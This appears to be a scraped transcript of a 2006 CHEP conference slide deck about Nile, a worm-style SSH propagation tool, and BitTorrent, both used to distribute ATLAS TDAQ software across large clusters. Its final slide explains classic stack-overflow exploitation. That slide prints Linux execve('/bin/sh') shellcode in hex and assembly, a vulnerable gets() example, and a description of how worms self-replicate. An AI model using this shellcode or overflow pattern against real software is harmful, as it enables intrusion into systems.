Download presentation
Presentation is loading. Please wait.
Published byLetitia Randall Modified over 9 years ago
1
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 1 02/14/2006, CHEP06, TIFR, Mumbai Worm and Peer To Peer Tools for Distribution and Management of ATLAS SW on TDAQ Clusters Hegoi Garitaonandia, IFAE, Barcelona, Spain Haimo Zobernig, University of Wisconsin, Madison, USA
2
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 2 02/14/2006, CHEP06, TIFR, Mumbai Outline ● Introduction and Motivation ● Nile, a Worm for Management and Distribution ● BitTorrent, a P2P for Distribution ● SW Distribution in ATLAS TDAQ ● Nile as Command Transport: Diagnostic Tools ● Conclusions and Further Work
3
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 3 02/14/2006, CHEP06, TIFR, Mumbai Introduction and Motivation ● ATLAS SW: 6GBytes per release, Large scale tests: over 600 nodes ● In some clusters outside CERN there is no SW distribution tool available ● Heterogeneous clusters ● Need of a lightweight tool. ● Two alternatives tested, with two different technologies: – A Worm: Nile – A Peer To Peer: BitTorrent ● Nile's additional usefull feature: – Propagation of executables.
4
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 4 02/14/2006, CHEP06, TIFR, Mumbai Nile, a Worm for Management and Distribution ● A script that uses worm technology to: – execute commands in a list of hosts – or copy files to/from them. ● Creates a hierarchical control network via worm propagation ● It takes as input: – a list of hosts – a list of hosts & propagation paths. ● Shutdown and network error recovery algorithm: – Reliable – Centralized logs ● Based on Distribulator, Rgang and Metasploit Project, but written from scratch. ● http://nile.ifae.es
5
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 5 02/14/2006, CHEP06, TIFR, Mumbai Nile, a Worm for Management and Distribution: Propagation of Executables Procedure: –Propagation with SSH transport to N machines (in parallel). –Nile protocol. –Launch the specified executable. –Propagation. Speed benefits in a 600 node cluster: –Maximum number of parallel SSH procs. is 25 in both cases ● Features: – Execution of shell commands – Perl script upload. – Run different commands on different computers. ● Recursive procedure: – Propagation with SSH transport to N machines. – Inherit SSH connection, receive a packet with routing info and payload. – Launch executable and ● Speed benefits in a 600 node cluster – With less than 25 processes per machine
6
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 6 02/14/2006, CHEP06, TIFR, Mumbai Nile, a Worm for Management and Distribution: File Distribution and Synchronization Features: –Incremental synchronization of the directories of many computers, with a directory in the main computer. –Copy files from many computers to the main one. –Via RSYNC on top of SSH or RSYNC on top of TCP. ● Procedure: – Similar to Nile in copy mode. – But synchronize, before jump. ● Throughput benefits:
7
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 7 02/14/2006, CHEP06, TIFR, Mumbai A P2P for File Distribution: BitTorrent (1) ● A distributed file sharing SW which adapts to network topology. ● Arquitecture: – Peers – Seeder – Metainformation file: ● File pieces information. ● pointer to the tracker. – Tracker – An adaptive algorithm ● Nile can be used to launch, check, monitor, and stop BitTorrent network.
8
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 8 02/14/2006, CHEP06, TIFR, Mumbai A P2P for File Distribution: BitTorrent (2)
9
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 9 02/14/2006, CHEP06, TIFR, Mumbai Quattor ● Quattor is a system administration toolkit – automated installation – configuration and management of clusters ● Publish & Pull arquitecture ● Can be configured with many SW repositories. ● But it wasn't used in these tests – Its behaviour was emulated – Simplest configuration: 1 repository – HTTP, no Squid cache's
10
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 10 02/14/2006, CHEP06, TIFR, Mumbai File Distribution in ATLAS TDAQ ● Two big tests with these tools so far – Large scale tests (see D.Burckhart's talk) – Pre-Series (see G.Unel's talk), (see M.Dobson's talk) ● Different working conditions ● Only one direct comparison ● Though some aspects cannot really be compared.
11
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 11 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Large Scale Tests with Unknown Network Topology ● 600 machines at CERN had to be installed locally with a 2GByte container file with the ATLAS TDAQ SW. ● The computers were spread over different physical locations – Virtual cluster. – No clear knowledge of the network topology. ● There were incompatibilities between the packaging systems – ATLAS SW – The official one in the cluster, RPM. ● The distribution of this file was an appropriate task for a P2P – BitTorrent 3.4
12
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 12 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Large Scale Tests with Unknown Network Topology ● BitTorrent – Adapted to the network topology – Performed better. ● With BT, when the number of nodes was incremented: – Correspondent switches from their labs added – The throughput increased. ● The bottle neck for parallel copy was the closest router – First tests a 100Mbps and then a 200Mbps one.
13
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 13 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Pre-Series with Known Network Topology ● Pre-Series is a small scale (10%) system the final ATLAS TDAQ (70 nodes). ● Its control network is the one of the figure above, with N=4 and different M for each switch. ● Nile is being used to synchronize the ATLAS SW, locally installed in all the machines with disk. ● Some performance measurements were taken (4 per point), with BT, Nile, and an emulation of a simple configuration of Quattor, for N=3 and M=4, 6 and 8.
14
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 14 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Pre-Series with Known Network Topology Nile 2.0.2 configured in two stages: –Performed the best of all three. –Throughput was close to the expected value. The parallel copy can be understood as the simplest Quattor configuration: –Only one SW repository, HTTP, no Squid caches
15
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 15 02/14/2006, CHEP06, TIFR, Mumbai Nile as Command Transport: TDAQ Diagnostic Tools ● Nile in execute mode can be used as transport mechanism by other tools: – Reliable. – Centralized logs. ● A set of tools, currently under development, is being built on top Nile. ● Their objective is to provide, in a fast way: – Unix resource monitoring. – TDAQ infrastructure monitoring and diagnostic. – Deallocation of resources. – Diagnostic, etc.
16
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 16 02/14/2006, CHEP06, TIFR, Mumbai Conclusions ● When no SW package distribution tool is avaliable: – Need of a (temporary?) solution. – P2P & Worm ● The P2P BitTorrent: – Adaptability makes it suitable for unknown network topologies. – Nile or similar must be used to launch BT. ● The worm Nile: – Performs better for known & more symetrical network topologies – It can synchronize incrementally. ● Nile alone, or the combination of both for: – Future large scale tests outside CERN – Network commissioning. ● Nile is useful for command transport – Applications on top of it. – TDAQ specific applications
17
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 17 02/14/2006, CHEP06, TIFR, Mumbai Further Work ● Keep improving Nile. ● Develop TDAQ specific tools on top of Nile. ● Integration of BitTorrent with Quattor – Both pull oriented ● File system on top of P2P?
18
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 18 02/14/2006, CHEP06, TIFR, Mumbai ? ● http://nile.ifae.es http://nile.ifae.es ● http://www.bittorrent.com http://www.bittorrent.com ● http://quattor.org http://quattor.org ● http://fermitools.fnal.gov/rgang http://fermitools.fnal.gov/rgang ● http://www.metasploit.com http://www.metasploit.com ● http://distribulator.sourceforge.net http://distribulator.sourceforge.net
19
Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 19 02/14/2006, CHEP06, TIFR, Mumbai Worms in a Nutshell: Hacking for Dummies Exploiting a C/C++ Stack Overflow Bug: Text Stack Data paramaters for func. call environmental variables main's stack frame return address saved frame pointer local vars: e.g. a char buffer lower address char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x0 0\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0 c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd 1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; jmp 0x2a # 3 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes.string \"/bin/sh\" # 8 bytes get reference (need to know, where it is being executed) name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); 3 ways of saying the same thing new return address main(){ buggy(); } buggy(){ char buf[12]; gets(buff); } The expoit: 1) negociate with program's protocol, 2) send shellcode. If instead of execve("/bin/sh"), the shellcode repeats (1) & (2): WORM
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.